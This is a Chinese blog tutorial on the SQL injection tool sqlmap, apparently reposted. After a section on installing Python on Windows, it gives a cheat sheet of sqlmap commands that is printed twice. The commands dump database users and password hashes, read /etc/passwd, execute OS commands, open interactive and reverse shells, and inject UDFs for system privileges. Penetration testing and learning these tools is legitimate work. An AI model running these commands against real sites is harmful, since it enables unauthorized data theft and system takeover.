sql注入检测好工具sqlmap
来源:互联网 发布:易语言dnf辅助源码站 编辑:程序博客网 时间:2024/05/17 10:06
在WooYun上面看到了有人用Sqlmap检测http链接是否存在sql注入,于是趁机学习了一把sqlmap,现把自己在学习中碰到的一些问题分享给大家。
转载请注明原文链接:http://blog.csdn.net/kaosini/article/details/8727653
Sqlmap简介
sqlmap 是一个自动SQL 射入工具。它是可胜任执行一个广泛的数据库管理系统后端指印, 检索遥远的DBMS 数据库, usernames, 桌, 专栏, 列举整个DBMS, 读了系统文件和利用导致SQL 射入弱点的网应用编程的安全漏洞。
sqlmap下载地址:http://download.csdn.net/detail/kaosini/5188257
想要运行sqlmap,必须安装python环境
Python环境安装及配置
Python 2.7.3 官方安装版(http://www.jb51.net/softs/2293.html)
默认情况下,在windows下安装python之后,系统并不会自动添加相应的环境变量。此时不能在命令行直接使用python命令。1. 首先需要在系统中注册python环境变量:假设python的安装路径为c:\python2.6,则修改我的电脑->属性->高级->环境变量->系统变量中的PATH为:
(为了在命令行模式下运行Python命令,需要将python.exe所在的目录附加到PATH这个环境变量中。)
PATH=PATH;c:\python26
上述环境变量设置成功之后,就可以在命令行直接使用python命令。或执行"python *.py"运行python脚本了。
2. 此时,还是只能通过"python *.py"运行python脚本,若希望直接运行*.py,只需再修改另一个环境变量PATHEXT:
PATHEXT=PATHEXT;.PY;.PYM
Sqlmap注意事项及用法
- 注意事项
1.运行py文件后,您可能会碰到一下错误:failed to set __main__.__loader__,这个是一个bug,py文件不能放在含有中文的路径下,果然将py文件放到纯英文路径下就没问题了。
2.sqlmap遇到url重写的时候怎么办?
在需要注入的参数后面,注入就加上 * 号
例:
sqlmap.py -u “http://www.expbug.com id1/1*/id2/2″
sqlmap.py -u "http://www.expbug.com/339*.html"
sqlmap.py -u "http://www.abc.com/a.aspx?name=abc" --current-user --current-db
- 用法
sqlmap -u “http://url/news?id=1″ --dbms “Mysql” –users # dbms 指定数 据库类型
sqlmap -u “http://url/news?id=1″--users #列数据库用户
sqlmap -u “http://url/news?id=1″--dbs#列数据库
sqlmap -u “http://url/news?id=1″--passwords #数据库用户密码
sqlmap -u “http://url/news?id=1″--passwords-U root -v 0 #列出指定用户 数据库密码
sqlmap -u “http://url/news?id=1″ --dump -C “password,user,id” -T “tablename”-D “db_name”
–start 1 –stop 20 #列出指定字段,列出20 条
sqlmap -u “http://url/news?id=1″--dump-all -v 0 #列出所有数据库所有表
sqlmap -u “http://url/news?id=1″--privileges #查看权限
sqlmap -u “http://url/news?id=1″--privileges -U root #查看指定用户权限sqlmap -u “http://url/news?id=1″ –is-dba -v 1 #是否是数据库管理员sqlmap -u “http://url/news?id=1″ –roles #枚举数据库用户角色
sqlmap -u “http://url/news?id=1″--udf-inject #导入用户自定义函数(获取 系统权限!)
sqlmap -u “http://url/news?id=1″--dump-all –exclude-sysdbs -v 0 #列 出当前库所有表
sqlmap -u “http://url/news?id=1″--union-cols #union 查询表记录
sqlmap -u “http://url/news?id=1″--cookie “COOKIE_VALUE”#cookie注入
sqlmap -u “http://url/news?id=1″--b #获取banner信息
sqlmap -u “http://url/news?id=1″--data “id=3″#post注入
sqlmap -u “http://url/news?id=1″-v 1 -f #指纹判别数据库类型
sqlmap -u “http://url/news?id=1″--proxy“http://127.0.0.1:8118” #代理注 入
sqlmap -u “http://url/news?id=1″--string”STRING_ON_TRUE_PAGE”# 指 定关键词
sqlmap -u “http://url/news?id=1″--sql-shell #执行指定sql命令
sqlmap -u “http://url/news?id=1″--file /etc/passwd
sqlmap -u “http://url/news?id=1″--os-cmd=whoami #执行系统命令
sqlmap -u “http://url/news?id=1″--os-shell #系统交互shell sqlmap -u “http://url/news?id=1″ –os-pwn #反弹shell
sqlmap -u “http://url/news?id=1″--reg-read #读取win系统注册表
sqlmap -u “http://url/news?id=1″--dbs-o “sqlmap.log”#保存进度
sqlmap -u “http://url/news?id=1″--dbs -o “sqlmap.log” –resume #恢复 已保存进度
sqlmap -u “http://url/news?id=1″--users #列数据库用户
sqlmap -u “http://url/news?id=1″--dbs#列数据库
sqlmap -u “http://url/news?id=1″--passwords #数据库用户密码
sqlmap -u “http://url/news?id=1″--passwords-U root -v 0 #列出指定用户 数据库密码
sqlmap -u “http://url/news?id=1″ --dump -C “password,user,id” -T “tablename”-D “db_name”
–start 1 –stop 20 #列出指定字段,列出20 条
sqlmap -u “http://url/news?id=1″--dump-all -v 0 #列出所有数据库所有表
sqlmap -u “http://url/news?id=1″--privileges #查看权限
sqlmap -u “http://url/news?id=1″--privileges -U root #查看指定用户权限sqlmap -u “http://url/news?id=1″ –is-dba -v 1 #是否是数据库管理员sqlmap -u “http://url/news?id=1″ –roles #枚举数据库用户角色
sqlmap -u “http://url/news?id=1″--udf-inject #导入用户自定义函数(获取 系统权限!)
sqlmap -u “http://url/news?id=1″--dump-all –exclude-sysdbs -v 0 #列 出当前库所有表
sqlmap -u “http://url/news?id=1″--union-cols #union 查询表记录
sqlmap -u “http://url/news?id=1″--cookie “COOKIE_VALUE”#cookie注入
sqlmap -u “http://url/news?id=1″--b #获取banner信息
sqlmap -u “http://url/news?id=1″--data “id=3″#post注入
sqlmap -u “http://url/news?id=1″-v 1 -f #指纹判别数据库类型
sqlmap -u “http://url/news?id=1″--proxy“http://127.0.0.1:8118” #代理注 入
sqlmap -u “http://url/news?id=1″--string”STRING_ON_TRUE_PAGE”# 指 定关键词
sqlmap -u “http://url/news?id=1″--sql-shell #执行指定sql命令
sqlmap -u “http://url/news?id=1″--file /etc/passwd
sqlmap -u “http://url/news?id=1″--os-cmd=whoami #执行系统命令
sqlmap -u “http://url/news?id=1″--os-shell #系统交互shell sqlmap -u “http://url/news?id=1″ –os-pwn #反弹shell
sqlmap -u “http://url/news?id=1″--reg-read #读取win系统注册表
sqlmap -u “http://url/news?id=1″--dbs-o “sqlmap.log”#保存进度
sqlmap -u “http://url/news?id=1″--dbs -o “sqlmap.log” –resume #恢复 已保存进度
- sql注入检测好工具sqlmap
- SQL注入工具sqlmap使用手记
- SQL注入工具sqlmap使用手记
- SQL注入--sqlmap自动化注入工具
- sql注入与sqlmap工具使用
- SQL注入神器-sqlmap
- 详解强大的SQL注入工具——SQLMAP
- 使用免费sqlmap工具抵御SQL注入攻击
- 详解强大的SQL注入工具——SQLMAP
- 可怕的注入工具sqlmap
- “SQLmap”网站注入测试工具
- 使用sqlmap进行sql注入
- 使用sqlmap进行sql注入
- SQL注入之SQLmap入门
- SQL注入之SQLmap入门
- SQL注入之SQLmap入门
- SQL注入及SQLmap使用
- SQL注入之SQLmap入门
- 开发的困惑
- 线程池的介绍及简单实现
- 黑马程序员-复习笔记之JavaBean详解
- iScroll 用法说明
- 新岸线平台搭建文档
- sql注入检测好工具sqlmap
- 不重新编译php, 安装curl扩展
- HttpClient ssl双向认证
- php utf8 截取字符串(支持中文)
- 调用系统程序导入手机上的vcard文件
- Android MediaPlayer架构图解
- Android Audio 01 - Control Block
- Android的intent之间复杂参数的传递
- 关闭子页面刷新父页面时候,Firefox 必须发送将会导致重复之前动作的数据(例如搜索或者下订单)。 ie提示:若要再次显示该页面,web浏览器需要重新发送您以前提交的信息